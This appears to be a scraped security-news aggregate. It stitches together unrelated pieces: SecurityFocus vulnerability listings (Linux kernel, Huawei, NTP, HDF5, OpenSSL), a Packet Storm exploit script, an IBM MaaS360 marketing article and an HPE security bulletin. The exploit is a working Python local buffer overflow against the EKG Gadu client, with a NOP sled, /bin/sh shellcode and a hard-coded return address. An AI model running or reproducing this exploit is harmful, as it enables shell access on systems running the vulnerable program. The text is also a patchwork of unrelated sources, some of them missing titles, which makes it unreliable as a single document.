Local

Vulnerable: Linux kernel 4.2.3
Linux kernel 4.1.4
Linux kernel 4.1.1
Linux kernel 4.0.6
Linux kernel 3.19.3
Linux kernel 3.18.22
Linux kernel 3.18.17
Linux kernel 3.18.11
Linux kernel 3.18.8
Linux kernel 3.18.7
Linux kernel 3.18.3
Linux kernel 3.18.2
Linux kernel 3.18.1
Linux kernel 3.17.4
Linux kernel 3.17.2
Linux kernel 3.16.7
Linux kernel 3.16.2
Linux kernel 3.16.1
Linux kernel 3.15.10
Linux kernel 3.15.5
Linux kernel 3.15.2
Linux kernel 3.14.54
Linux kernel 3.14.45
Linux kernel 3.14.37
Linux kernel 3.14.4
Linux kernel 3.14.3
Linux kernel 3.14.2
Linux kernel 3.13.11
Linux kernel 3.13.9
Linux kernel 3.13.3
Linux kernel 3.13.1
Linux kernel 3.12.49
Linux kernel 3.12.48
Linux kernel 3.12.44
Linux kernel 3.12.40
Linux kernel 3.12.21
Linux kernel 3.12.18
Linux kernel 3.12.17
Linux kernel 3.12.16
Linux kernel 3.12.11
Linux kernel 3.12.7
Linux kernel 3.12.4
Linux kernel 3.12.3
Linux kernel 3.12.2
Linux kernel 3.11.3
Linux kernel 3.10.90
Linux kernel 3.10.81
Linux kernel 3.10.73
Linux kernel 3.10.45
Linux kernel 3.10.41
Linux kernel 3.10.38
Linux kernel 3.10.37
Linux kernel 3.10.36
Linux kernel 3.10.30
Linux kernel 3.10.27
Linux kernel 3.10.26
Linux kernel 3.10.23
Linux kernel 3.10.22
Linux kernel 3.10.21
Linux kernel 3.10.14
Linux kernel 3.10.10
Linux kernel 3.10.9
Linux kernel 3.10.7
Linux kernel 3.8.9
Linux kernel 3.8.6
Linux kernel 3.8.5
Linux kernel 3.8.4
Linux kernel 3.8.2
Linux kernel 3.8.1
Linux kernel 3.7.10
Linux kernel 3.7.9
Linux kernel 3.7.8
Linux kernel 3.7.7
Linux kernel 3.7.5
Linux kernel 3.7.4
Linux kernel 3.7.3
Linux kernel 3.7.2
Linux kernel 3.7.1
Linux kernel 3.6.11
Linux kernel 3.6.10
Linux kernel 3.6.9
Linux kernel 3.6.8
Linux kernel 3.6.7
Linux kernel 3.6.6
Linux kernel 3.6.5
Linux kernel 3.6.4
Linux kernel 3.6.3
Linux kernel 3.6.2
Linux kernel 3.6.1
Linux kernel 3.5.7
Linux kernel 3.5.6
Linux kernel 3.5.5
Linux kernel 3.5.4
Linux kernel 3.5.3
Linux kernel 3.5.2
Linux kernel 3.5.1
Linux kernel 3.4.88
Linux kernel 3.4.87
Linux kernel 3.4.86
Linux kernel 3.4.80
Linux kernel 3.4.76
Linux kernel 3.4.73
Linux kernel 3.4.72
Linux kernel 3.4.71
Linux kernel 3.4.64
Linux kernel 3.4.58
Linux kernel 3.4.42
Linux kernel 3.4.36
Linux kernel 3.4.32
Linux kernel 3.4.31
Linux kernel 3.4.27
Linux kernel 3.4.26
Linux kernel 3.4.25
Linux kernel 3.4.21
Linux kernel 3.4.20
Linux kernel 3.4.19
Linux kernel 3.4.18
Linux kernel 3.4.17
Linux kernel 3.4.16
Linux kernel 3.4.15
Linux kernel 3.4.14
Linux kernel 3.4.13
Linux kernel 3.4.12
Linux kernel 3.4.11
Linux kernel 3.4.10
Linux kernel 3.4.9
Linux kernel 3.4.8
Linux kernel 3.4.7
Linux kernel 3.4.6
Linux kernel 3.4.5
Linux kernel 3.4.4
Linux kernel 3.4.3
Linux kernel 3.4.2
Linux kernel 3.4.1
Linux kernel 3.3.5
Linux kernel 3.3.4
Linux kernel 3.3.2
Linux kernel 3.2.82
Linux kernel 3.2.72
Linux kernel 3.2.62
Linux kernel 3.2.57
Linux kernel 3.2.56
Linux kernel 3.2.51
Linux kernel 3.2.24
Linux kernel 3.2.23
Linux kernel 3.2.13
Linux kernel 3.2.12
Linux kernel 3.2.9
Linux kernel 3.2.1
Linux kernel 3.1.8
Linux kernel 3.0.98
Linux kernel 3.0.75
Linux kernel 3.0.72
Linux kernel 3.0.69
Linux kernel 3.0.65
Linux kernel 3.0.60
Linux kernel 3.0.59
Linux kernel 3.0.58
Linux kernel 3.0.37
Linux kernel 3.0.34
Linux kernel 3.0.5
Linux kernel 3.0.4
Linux kernel 3.0.2
Linux kernel 3.0.1
Linux kernel 2.6.39
Linux kernel 2.6.38
Linux kernel 2.6.37
Linux kernel 2.6.36
Linux kernel 2.6.35
Linux kernel 2.6.34
Linux kernel 2.6.33 .1
Linux kernel 2.6.33
Linux kernel 2.6.32 .9
Linux kernel 2.6.32
Linux kernel 2.6.31 5
Linux kernel 2.6.31 13
Linux kernel 2.6.31 .2
Linux kernel 2.6.31 .11
Linux kernel 2.6.31
Linux kernel 2.6.30 .10
Linux kernel 2.6.30 .1
Linux kernel 2.6.30
Linux kernel 2.6.29 .4
Linux kernel 2.6.29 .1
Linux kernel 2.6.29
Linux kernel 2.6.28 .9
Linux kernel 2.6.28 .8
Linux kernel 2.6.28 .6
Linux kernel 2.6.28 .5
Linux kernel 2.6.28 .3
Linux kernel 2.6.28 .2
Linux kernel 2.6.28 .1
Linux kernel 2.6.28
Linux kernel 2.6.27 6
Linux kernel 2.6.27 3
Linux kernel 2.6.27 12
Linux kernel 2.6.27 .8
Linux kernel 2.6.27 .5
Linux kernel 2.6.27 .46
Linux kernel 2.6.27 .24
Linux kernel 2.6.27 .14
Linux kernel 2.6.27 .13
Linux kernel 2.6.27 .12
Linux kernel 2.6.27
Linux kernel 2.6.26 7
Linux kernel 2.6.26 .6
Linux kernel 2.6.26 .4
Linux kernel 2.6.26 .3
Linux kernel 2.6.26
Linux kernel 2.6.25 19
Linux kernel 2.6.25 .9
Linux kernel 2.6.25 .8
Linux kernel 2.6.25 .7
Linux kernel 2.6.25 .6
Linux kernel 2.6.25 .5
Linux kernel 2.6.25 .15
Linux kernel 2.6.25 .13
Linux kernel 2.6.25 .12
Linux kernel 2.6.25 .11
Linux kernel 2.6.25 .10
Linux kernel 2.6.25
Linux kernel 2.6.24 .2
Linux kernel 2.6.24 .1
Linux kernel 2.6.24
Linux kernel 2.6.23 .7
Linux kernel 2.6.23 .6
Linux kernel 2.6.23 .5
Linux kernel 2.6.23 .4
Linux kernel 2.6.23 .3
Linux kernel 2.6.23 .2
Linux kernel 2.6.23
Linux kernel 2.6.22 .8
Linux kernel 2.6.22 .7
Linux kernel 2.6.22 .6
Linux kernel 2.6.22 .5
Linux kernel 2.6.22 .4
Linux kernel 2.6.22 .3
Linux kernel 2.6.22 .2
Linux kernel 2.6.22 .17
Linux kernel 2.6.22 .16
Linux kernel 2.6.22 .15
Linux kernel 2.6.22 .14
Linux kernel 2.6.22 .13
Linux kernel 2.6.22 .12
Linux kernel 2.6.22 .11
Linux kernel 2.6.22 .1
Linux kernel 2.6.22
Linux kernel 2.6.21 4
Linux kernel 2.6.21 .7
Linux kernel 2.6.21 .6
Linux kernel 2.6.21 .3
Linux kernel 2.6.21 .2
Linux kernel 2.6.21 .1
Linux kernel 2.6.21
Linux kernel 2.6.20 .9
Linux kernel 2.6.20 .8
Linux kernel 2.6.20 .7
Linux kernel 2.6.20 .6
Linux kernel 2.6.20 .5
Linux kernel 2.6.20 .4
Linux kernel 2.6.20 .15
Linux kernel 2.6.20 .14
Linux kernel 2.6.20 .12
Linux kernel 2.6.20 .10
Linux kernel 2.6.20 .1
Linux kernel 2.6.20
Linux kernel 2.6.19 .4
Linux kernel 2.6.19 .3
Linux kernel 2.6.19 .2
Linux kernel 2.6.19 .1
Linux kernel 2.6.19
Linux kernel 2.6.18 .8
Linux kernel 2.6.18 .7
Linux kernel 2.6.18 .6
Linux kernel 2.6.18 .5
Linux kernel 2.6.18 .4
Linux kernel 2.6.18 .3
Linux kernel 2.6.18 .2
Linux kernel 2.6.18 .1
Linux kernel 2.6.17 .9
Linux kernel 2.6.17 .8
Linux kernel 2.6.17 .7
Linux kernel 2.6.17 .6
Linux kernel 2.6.17 .5
Linux kernel 2.6.17 .4
Linux kernel 2.6.17 .3
Linux kernel 2.6.17 .2
Linux kernel 2.6.17 .14
Linux kernel 2.6.17 .13
Linux kernel 2.6.17 .12
Linux kernel 2.6.17 .11
Linux kernel 2.6.17 .10
Linux kernel 2.6.17 .1
Linux kernel 2.6.17
Linux kernel 2.6.16 27
Linux kernel 2.6.16 13
Linux kernel 2.6.16 .9
Linux kernel 2.6.16 .8
Linux kernel 2.6.16 .7
Linux kernel 2.6.16 .6
Linux kernel 2.6.16 .53
Linux kernel 2.6.16 .52
Linux kernel 2.6.16 .51
Linux kernel 2.6.16 .50
Linux kernel 2.6.16 .5
Linux kernel 2.6.16 .49
Linux kernel 2.6.16 .48
Linux kernel 2.6.16 .47
Linux kernel 2.6.16 .46
Linux kernel 2.6.16 .45
Linux kernel 2.6.16 .44
Linux kernel 2.6.16 .43
Linux kernel 2.6.16 .41
Linux kernel 2.6.16 .40
Linux kernel 2.6.16 .4
Linux kernel 2.6.16 .39
Linux kernel 2.6.16 .38
Linux kernel 2.6.16 .37
Linux kernel 2.6.16 .36
Linux kernel 2.6.16 .35
Linux kernel 2.6.16 .34
Linux kernel 2.6.16 .33
Linux kernel 2.6.16 .32
Linux kernel 2.6.16 .31
Linux kernel 2.6.16 .30
Linux kernel 2.6.16 .3
Linux kernel 2.6.16 .29
Linux kernel 2.6.16 .28
Linux kernel 2.6.16 .27
Linux kernel 2.6.16 .26
Linux kernel 2.6.16 .25
Linux kernel 2.6.16 .24
Linux kernel 2.6.16 .23
Linux kernel 2.6.16 .22
Linux kernel 2.6.16 .21
Linux kernel 2.6.16 .20
Linux kernel 2.6.16 .2
Linux kernel 2.6.16 .19
Linux kernel 2.6.16 .18
Linux kernel 2.6.16 .17
Linux kernel 2.6.16 .16
Linux kernel 2.6.16 .15
Linux kernel 2.6.16 .14
Linux kernel 2.6.16 .12
Linux kernel 2.6.16 .11
Linux kernel 2.6.16 .10
Linux kernel 2.6.16 .1
Linux kernel 2.6.16
Linux kernel 2.6.15 .7
Linux kernel 2.6.15 .6
Linux kernel 2.6.15 .4
Linux kernel 2.6.15 .3
Linux kernel 2.6.15 .2
Linux kernel 2.6.15 .1
Linux kernel 2.6.15
Linux kernel 2.6.14 .7
Linux kernel 2.6.14 .6
Linux kernel 2.6.14 .5
Linux kernel 2.6.14 .4
Linux kernel 2.6.14 .3
Linux kernel 2.6.14 .2
Linux kernel 2.6.14 .1
Linux kernel 2.6.14
Linux kernel 2.6.13 .5
Linux kernel 2.6.13 .4
Linux kernel 2.6.13 .3
Linux kernel 2.6.13 .2
Linux kernel 2.6.13 .1
Linux kernel 2.6.13
Linux kernel 2.6.12 .6
Linux kernel 2.6.12 .5
Linux kernel 2.6.12 .4
Linux kernel 2.6.12 .3
Linux kernel 2.6.12 .22
Linux kernel 2.6.12 .2
Linux kernel 2.6.12 .12
Linux kernel 2.6.12 .1
Linux kernel 2.6.12
Linux kernel 2.6.11 .9
Linux kernel 2.6.11 .8
Linux kernel 2.6.11 .7
Linux kernel 2.6.11 .6
Linux kernel 2.6.11 .5
Linux kernel 2.6.11 .4
Linux kernel 2.6.11 .3
Linux kernel 2.6.11 .2
Linux kernel 2.6.11 .12
Linux kernel 2.6.11 .11
Linux kernel 2.6.11 .10
Linux kernel 2.6.11 .1
Linux kernel 2.6.11
Linux kernel 2.6.10
Linux kernel 2.6.9
Linux kernel 2.6.8
Linux kernel 2.6.7
Linux kernel 2.6.6
Linux kernel 2.6.5
Linux kernel 2.6.4
Linux kernel 2.6.3
Linux kernel 2.6.2
Linux kernel 2.6.1
Linux kernel 2.6 .10
Linux kernel 2.6
Linux kernel 4.4
Linux kernel 4.3.3
Linux kernel 4.3-rc1
Linux kernel 4.2.8
Linux kernel 4.2
Linux kernel 4.1.15
Linux kernel 4.1-rc7
Linux kernel 4.1-rc6
Linux kernel 4.1-rc3
Linux kernel 4.1-rc1
Linux kernel 4.1
Linux kernel 4.0.5
Linux kernel 4.0
Linux kernel 3.9.8
Linux kernel 3.9.4
Linux kernel 3.9
Linux kernel 3.8
Linux kernel 3.7.6
Linux kernel 3.7
Linux kernel 3.6
Linux kernel 3.5
Linux kernel 3.4.93
Linux kernel 3.4.81
Linux kernel 3.4.70
Linux kernel 3.4.67
Linux kernel 3.4.29
Linux kernel 3.4
Linux kernel 3.3
Linux kernel 3.2.81
Linux kernel 3.2.78
Linux kernel 3.2.65
Linux kernel 3.2.64
Linux kernel 3.2.63-2
Linux kernel 3.2.63
Linux kernel 3.2.60
Linux kernel 3.2.55
Linux kernel 3.2.54
Linux kernel 3.2.53
Linux kernel 3.2.52
Linux kernel 3.2.50
Linux kernel 3.2.44
Linux kernel 3.2.42
Linux kernel 3.2.38
Linux kernel 3.2.2
Linux kernel 3.2
Linux kernel 3.19
Linux kernel 3.18.9
Linux kernel 3.18
Linux kernel 3.17.6
Linux kernel 3.17
Linux kernel 3.16.6
Linux kernel 3.16.36
Linux kernel 3.16
Linux kernel 3.15
Linux kernel 3.14.73
Linux kernel 3.14.7
Linux kernel 3.14.5
Linux kernel 3.14-4
Linux kernel 3.14-1
Linux kernel 3.14
Linux kernel 3.13.7
Linux kernel 3.13.6
Linux kernel 3.13.5
Linux kernel 3.13.4
Linux kernel 3.13
Linux kernel 3.12.22
Linux kernel 3.12.15
Linux kernel 3.12.14
Linux kernel 3.12.12
Linux kernel 3.12.1
Linux kernel 3.12
Linux kernel 3.11.9
Linux kernel 3.11.6
Linux kernel 3.11
Linux kernel 3.10.5
Linux kernel 3.10.43
Linux kernel 3.10.31
Linux kernel 3.10.20
Linux kernel 3.10.17
Linux kernel 3.10
Linux kernel 3.1
Linux kernel 3.0.66
Linux kernel 3.0.62
Linux kernel 3.0.18
Linux kernel 3.0
Linux kernel 2.6.8.1
Linux kernel 2.6.38.6
Linux kernel 2.6.38.4
Linux kernel 2.6.38.3
Linux kernel 2.6.38.2
Linux kernel 2.6.37.2
Linux kernel 2.6.35.5
Linux kernel 2.6.35.4
Linux kernel 2.6.35.13
Linux kernel 2.6.35.1
Linux kernel 2.6.34.3
Linux kernel 2.6.34.2
Linux kernel 2.6.34.14
Linux kernel 2.6.34.13
Linux kernel 2.6.34.1
Linux kernel 2.6.33.7
Linux kernel 2.6.32.8
Linux kernel 2.6.32.7
Linux kernel 2.6.32.62
Linux kernel 2.6.32.61
Linux kernel 2.6.32.60
Linux kernel 2.6.32.6
Linux kernel 2.6.32.5
Linux kernel 2.6.32.4
Linux kernel 2.6.32.3
Linux kernel 2.6.32.28
Linux kernel 2.6.32.22
Linux kernel 2.6.32.2
Linux kernel 2.6.32.18
Linux kernel 2.6.32.17
Linux kernel 2.6.32.16
Linux kernel 2.6.32.15
Linux kernel 2.6.32.14
Linux kernel 2.6.32.13
Linux kernel 2.6.32.12
Linux kernel 2.6.32.11
Linux kernel 2.6.32.10
Linux kernel 2.6.32.1
Linux kernel 2.6.31.6
Linux kernel 2.6.31.4
Linux kernel 2.6.31.1
Linux kernel 2.6.30.5
Linux kernel 2.6.30.4
Linux kernel 2.6.30.3
Linux kernel 2.6.28.4
Linux kernel 2.6.28.10
Linux kernel 2.6.27.54
Linux kernel 2.6.27.51
Linux kernel 2.6.27.49
Linux kernel 2.6.27.26
Linux kernel 2.6.26.1
Linux kernel 2.6.25.4
Linux kernel 2.6.25.3
Linux kernel 2.6.25.2
Linux kernel 2.6.25.1
Linux kernel 2.6.24.6
Linux kernel 2.6.24.4
Linux kernel 2.6.24.3
Linux kernel 2.6.23.14
Linux kernel 2.6.23.10
Linux kernel 2.6.23.1
Linux kernel 2.6.23.09
Linux kernel 2.6.20.3
Linux kernel 2.6.20.2
Linux kernel 2.6.20.13
Linux kernel 2.6.20.11
Linux kernel 2.6.20-2
Linux kernel 2.6.18.1
Linux kernel 2.6.18-53
Linux kernel 2.6.18
Linux kernel 2.6.16.9
Linux kernel 2.6.16.7
Linux kernel 2.6.16.19
Linux kernel 2.6.16.13
Linux kernel 2.6.16.12
Linux kernel 2.6.16.11
Linux kernel 2.6.15.5
Linux kernel 2.6.15.4
Linux kernel 2.6.15.11
Linux kernel 2.6.14.3
Linux kernel 2.6.14.2
Linux kernel 2.6.14.1
Linux kernel 2.6.13.4
Linux kernel 2.6.13.3
Linux kernel 2.6.13.2
Linux kernel 2.6.13.1
Linux kernel 2.6.12.6
Linux kernel 2.6.12.5
Linux kernel 2.6.12.4
Linux kernel 2.6.12.3
Linux kernel 2.6.12.2
Linux kernel 2.6.12.1
Linux kernel 2.6.11.8
Linux kernel 2.6.11.7
Linux kernel 2.6.11.6
Linux kernel 2.6.11.5
Linux kernel 2.6.11.4
Linux kernel 2.6.11.12
Linux kernel 2.6.11.11


SecurityFocus Vulnerabilities

Multiple Huawei Products CVE-2016-8768 Local Privilege Escalation

Bugtraq ID: 93885
Class: Design Error
CVE: CVE-2016-8768
Remote: No
Local: Yes
Published: Oct 26 2016 12:00AM
Updated: Nov 25 2016 02:04PM
Credit: Zhao Jianqiang, Chen Gengjia, Wang Qize, Zhu Bin and Pan Yu.
Vulnerable: Huawei Honor 7 6.9
Huawei Honor 6 Plus 6.9
Huawei Honor 6 6.9
Not Vulnerable: Huawei Honor 7 6.9.16
Huawei Honor 6 Plus 6.9.16
Huawei Honor 6 6.9.16


SecurityFocus Vulnerabilities

Bugtraq ID: 94455
Class: Failure to Handle Exceptional Conditions
CVE: CVE-2016-7433
Remote: No
Local: Yes
Published: Nov 21 2016 12:00AM
Updated: Nov 22 2016 12:12AM
Credit: Brian Utterback of Oracle, and Sharon Goldberg and Aanchal Malhotra of Boston University.
Vulnerable: NTP NTP 4.3.90
NTP NTP 4.2.8
NTP NTP 4.1.2
NTP NTP 4.3.93
NTP NTP 4.3.92
NTP NTP 4.2.8p8
NTP NTP 4.2.8p7
NTP NTP 4.2.8p6
NTP NTP 4.2.8p5
NTP NTP 4.2.8p4
NTP NTP 4.2.8p3-RC1
NTP NTP 4.2.8p3
NTP NTP 4.2.8p2
NTP NTP 4.2.8p1
NTP NTP 4.2.7p385
Not Vulnerable: NTP NTP 4.3.94
NTP NTP 4.2.8p9


SecurityFocus Vulnerabilities

HDF5 CVE-2016-4332 Local Heap Overflow Vulnerability

Bugtraq ID: 94417
Class: Boundary Condition Error
CVE: CVE-2016-4332
Remote: No
Local: Yes
Published: Nov 17 2016 12:00AM
Updated: Nov 20 2016 12:12AM
Credit: Cisco Talos.
Vulnerable: HDF5 HDF5 1.8.16
Not Vulnerable:


SecurityFocus Vulnerabilities

HDF5 CVE-2016-4333 Local Heap Buffer Overflow Vulnerability

Bugtraq ID: 94416
Class: Unknown
CVE: CVE-2016-4333
Remote: No
Local: Yes
Published: Nov 17 2016 12:00AM
Updated: Nov 20 2016 12:12AM
Credit: Cisco Talos.
Vulnerable: HDF5 HDF5 1.8.16
Not Vulnerable:


SecurityFocus Vulnerabilities

Bugtraq ID: 93153
Class: Failure to Handle Exceptional Conditions
CVE: CVE-2016-6306
Remote: No
Local: Yes
Published: Sep 23 2016 12:00AM
Updated: Sep 25 2016 12:00AM
Credit: Shi Lei (Gear Team, Qihoo 360 Inc.)
Vulnerable: OpenSSL Project OpenSSL 1.0.2
OpenSSL Project OpenSSL 1.0.2h
OpenSSL Project OpenSSL 1.0.2g
OpenSSL Project OpenSSL 1.0.2f
OpenSSL Project OpenSSL 1.0.2e
OpenSSL Project OpenSSL 1.0.2d
OpenSSL Project OpenSSL 1.0.2c
OpenSSL Project OpenSSL 1.0.2b
OpenSSL Project OpenSSL 1.0.2a
OpenSSL Project OpenSSL 1.0.1t
OpenSSL Project OpenSSL 1.0.1s
OpenSSL Project OpenSSL 1.0.1r
OpenSSL Project OpenSSL 1.0.1q
OpenSSL Project OpenSSL 1.0.1p
OpenSSL Project OpenSSL 1.0.1o
OpenSSL Project OpenSSL 1.0.1n
OpenSSL Project OpenSSL 1.0.1m
OpenSSL Project OpenSSL 1.0.1l
OpenSSL Project OpenSSL 1.0.1k
OpenSSL Project OpenSSL 1.0.1j
OpenSSL Project OpenSSL 1.0.1i
OpenSSL Project OpenSSL 1.0.1h
OpenSSL Project OpenSSL 1.0.1g
OpenSSL Project OpenSSL 1.0.1f
OpenSSL Project OpenSSL 1.0.1e
OpenSSL Project OpenSSL 1.0.1d
OpenSSL Project OpenSSL 1.0.1c
OpenSSL Project OpenSSL 1.0.1b
OpenSSL Project OpenSSL 1.0.1a
OpenSSL Project OpenSSL 1.0.1
Not Vulnerable: OpenSSL Project OpenSSL 1.0.2i
OpenSSL Project OpenSSL 1.0.1u


SecurityFocus Vulnerabilities

# Exploit developed using Exploit Pack v6.01
# Exploit Author: Juan Sacco - http://www.exploitpack.com -
# [email protected]
# Program affected: EKG Gadu
# Affected value: USERNAME
# Version: 1:1.9~pre+r2855-3+b1
#
# Tested and developed under: Kali Linux 2.0 x86 - https://www.kali.org
# Program description: console Gadu Gadu client for UNIX systems - ncurses UI
# EKG ("Eksperymentalny Klient Gadu-Gadu") is an open source
# Gadu-Gadu client for UNIX systems.
# Kali Linux 2.0 package: pool/main/e/ekg/ekg_1.9~pre+r2855-3+b1_i386.deb
# MD5sum: c752577dfb5ea44513a3fb351d431afa
# Website: http://ekg.chmurka.net/
#
# gdb$ run `python -c 'print "A"*258'`
# 0x0807e125 in strlcpy ()
# gdb$ backtrace
# #0 0x0807e125 in strlcpy ()
# #1 0x080570bb in ioctld_socket ()
# #2 0x08052e60 in main ()

import os, subprocess, sys

def run():
    try:
        print "# EKG Gadu - Local Buffer Overflow by Juan Sacco"
        print "# This Exploit has been developed using Exploit Pack - http://exploitpack.com"
        # NOPSLED + SHELLCODE + EIP

        buffersize = 240
        nopsled = "\x90"*30
        shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
        eip = "\x20\xf1\xff\xbf"
        buffer = nopsled * (buffersize-len(shellcode)) + eip
        subprocess.call(["ekg ",' ', buffer])

    except OSError as e:
        if e.errno == os.errno.ENOENT:
            print "Sorry, EKG Gadu - Not found!"
        else:
            print "Error executing exploit"
        raise

def howtousage():
    print "Snap! Something went wrong"
    sys.exit(-1)

if __name__ == '__main__':
    try:
        print "Exploit EKG Gadu - Local Overflow Exploit"
        print "Author: Juan Sacco - Exploit Pack"
    except IndexError:
        howtousage()
run()


Exploit Files ≈ Packet Storm

In modern business, the complexity and range of use cases for mobile continues to expand. Mobile data, the catalyst for this growth, is a double-edged sword: It empowers organizations just as much as it endangers them. It provides invaluable information instantaneously and a constant connectivity that enables workers to do their jobs regardless of where they’re situated.

Its benefits notwithstanding, mobile data exposes companies of all types and sizes to innumerable risks related to its transmission, storage and overall level of protection.

Through continued global investment in its platform, services and technology, IBM MaaS360 provides the tools and resources required by worldwide enterprise mobility management (EMM) clients to carefully balance the benefits of mobility with its associated risks. This enables organizations to achieve an equilibrium that ensures:

  • Compliance with local, national and global regulations;
  • Data privacy; and
  • A strong mobile security strategy.

MaaS360 for Cross-Country Data Compliance

Regarded by leading analysts as a best-in-class cloud offering, MaaS360 EMM epitomizes the 24/7 accessibility that empowers organizations to fully enable, manage and secure their mobile devices, apps, docs and data on a global scale. These clients must also comply with local data privacy regulations as their mobile data makes its way across international borders.

To accommodate customers seeking a software-as-a-service (SaaS) offering whose operations extend across foreign countries and continents, MaaS360 has announced an expansion that will extend localized services within the next two years across Europe, Asia and the Americas. Developmental processes have already begun for the first two, for which support will launch in India and France.

MaaS360 will be added to existing IBM Cloud locations. To date, IBM Cloud has amassed 47 data centers across 26 countries, a network with which MaaS360 will continue to grow as IBM further extends its global footprint.


Built for Compliance

MaaS360 will be contextually architected with regional ordinances taken into consideration. This will enable customers to expand their flexibility via global transmissions of mobile data without violating local privacy standards.

For example, European clients, and others whose data flows through Europe, will need to abide by new EU directives arriving in May 2018. The General Data Protection Regulation (GDPR) will dictate how businesses address their data life cycles — things like management, access, storage and security. Those who fail to comply will face costly consequences. It’s important for clients to maintain focus on large-scale mobile rollouts that meet local requirements.

Expert Consultation for GDPR Readiness

Merely complying with regulations should never be the goal. Compliance should be the starting point of a larger strategy built for long-term success.

With IBM Privacy Consulting Services, customers can analyze their current processes and fine-tune their efforts surrounding data privacy. Experienced IBM mobility experts work directly with your internal business, legal, IT and management representatives to address current gaps, establishing best practices to oust the competition and maximize returns on other technology investments.


With more than a year remaining until the GDPR is in full swing, now is the time for organizations to peel back the layers on their current strategies and determine how they can put their best foot forward for future success within an intensifying regulatory climate.

Leveraging IBM Privacy Consulting Services, clients can assess their readiness for the GDPR and identify the roadblocks they’ll need to overcome between now and May 2018 to ensure they’re acclimatized for data privacy.

New Services to Accelerate Mobile Success

Expanding on its new service offerings portfolio, IBM MaaS360 unveiled a complete program geared toward maturity and success with secure enterprise mobility, including:

  • Mobile Security and Productivity Workshops to ensure strategy, policy and technology are aligned to meet organizational goals for enterprise mobility;
  • Mobility Success Services to help your organization achieve fast time to value for your investment in MaaS360 for mobile devices, apps and content;
  • Health Check Services to assess full mobile environment status, review challenges and recommend actions; and
  • Mobility Training Workshops to impart mobile expertise to operations, administrative and help desk teams.

Among our Mobility Success Services, customers may opt for Quick Start or Time-to-Value Services, which can be completed in as few as six days or up to three months, depending on how thorough a review they are looking to complete.

Quick Start Services afford fast and exceptional guidance to maximize your investment. With Time-to-Value Services, we remain at your side every step of the way for an in-depth engagement to help maximize ROI and jump-start mobile transformation.

Since the organizations we work with vary widely in size and variety, each service is tailored to the unique needs of the individual client. We begin by gathering specific information on the environment in its current state, analyzing findings and measuring for competency with industry standards. We then provide recommendations to ensure all facets of the program are hitting on all cylinders for a successful implementation.

MaaS360 Packaging Structure

In alignment with these new services, IBM recently released new product packaging for MaaS360 that is structured around organizational maturity within the EMM market:

  1. Essentials for entry-level mobility management;
  2. Deluxe for extended control over secure productivity;
  3. Premier for the full gamut of tools needed for access and collaboration; and
  4. Enterprise for sophisticated analysis, malware detection and effortless scaling.

Sequentially organized, each new tier is intended to grow alongside enterprises, taking into account the various malleable forces at play in the ever-changing market. These include strategy shifts, increases in device volume, software and hardware advancements, new use cases for mobile and the growing threat landscape.

EMM Meets CASB for End-to-End Integration

Without the right tools to assess activity, analyze threat severity and enforce corporate policies, cloud resources in your environment can be accessed without authorization. IBM’s latest integration of MaaS360 with IBM Cloud Security Enforcer (CSE) gives system administrators the visibility, analysis and control that is critical to achieving secure mobile cloud resource access in their environment. The integration enables security leaders to:

  • Assess identity and security posture to control access to enterprise cloud apps;
  • Leverage IBM X-Force integrity analyses to evaluate the integrity of accessed resources; and
  • Prohibit access to apps that do not meet security requirements.

Learn More

In the coming weeks, MaaS360 experts will outline the full impact of these new investments and advancements as they make their way to the enterprise. Join us for our upcoming webinars and learn how:

  • MaaS360 will enable adherence to regional data privacy standards;
  • Services aid in the design and development of a modern mobility strategy;
  • Solutions packaging accelerates organizational maturity with enterprise mobility; and
  • CSE integration advances transparency and control over cloud app and resource access.

MaaS360 Goes Global to Keep Data Local — Join the Sept. 28 webinar to learn more


Security Intelligence

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Note: the current version of the following document is available here:
https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c05257711

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c05257711
Version: 1

HPSBST03640 rev.1 - HP XP7 Command View Advance Edition Suite (CVAE) using
Replication Manager (RepMgr) and Device Manager (DevMgr), Local Access
Restriction Bypass

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2016-09-01
Last Updated: 2016-09-01

Potential Security Impact: Local Access Restriction Bypass

Source: Hewlett Packard Enterprise, Product Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified in HP XP7 Command View
Advance Edition Suite (CVAE) using Replication Manager (RepMgr) and Device
Manager (DevMgr). This vulnerability could be locally exploited to allow
access restriction bypass.

References:

- CVE-2016-4381
- PSRT110214

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP XP7 Command View Advanced Edition Suite RepMgr and DevMgr version 6.2.0-00
to versions prior to 8.4.1-02

BACKGROUND

CVSS Base Metrics
=================
Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector

CVE-2016-4381
5.3 CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L
4.6 (AV:L/AC:L/Au:N/C:P/I:P/A:P)

Information on CVSS is documented in
HPE Customer Notice HPSN-2008-002 here:

https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499

RESOLUTION

HPE has released the following software updates to resolve the vulnerability
in HP XP7 Command View Advance Edition Suite.

- Device Manager (DevMgr) version 8.4.1-02
- Replication Manager (RepMgr) version 8.4.1-02

The updates are available from the following locations.

- Full installer updates:

https://h20575.www2.hp.com/usbportal/softwareupdate.do

- Patches:

https://h20575.www2.hpe.com/tsusbportal/index.do?lc=EN_US&src=HPSC

**Note:** A valid HPE Passport account is needed to download the patches.
Please contact HPE Technical Support for assistance.

HISTORY
Version:1 (rev.1) - 1 September 2016 Initial release

Third Party Security Patches: Third party security patches that are to be
installed on systems running Hewlett Packard Enterprise (HPE) software
products should be applied in accordance with the customer's patch management
policy.

Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HPE Services support channel. For other issues about
the content of this Security Bulletin, send e-mail to security-alert (at) hpe (dot) com.

Report: To report a potential security vulnerability for any HPE supported
product:
Web form: https://www.hpe.com/info/report-security-vulnerability
Email: security-alert (at) hpe (dot) com

Subscribe: To initiate a subscription to receive future HPE Security Bulletin
alerts via Email: http://www.hpe.com/support/Subscriber_Choice

Security Bulletin Archive: A list of recently released Security Bulletins is
available here: http://www.hpe.com/support/Security_Bulletin_Archive

Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.

3C = 3COM
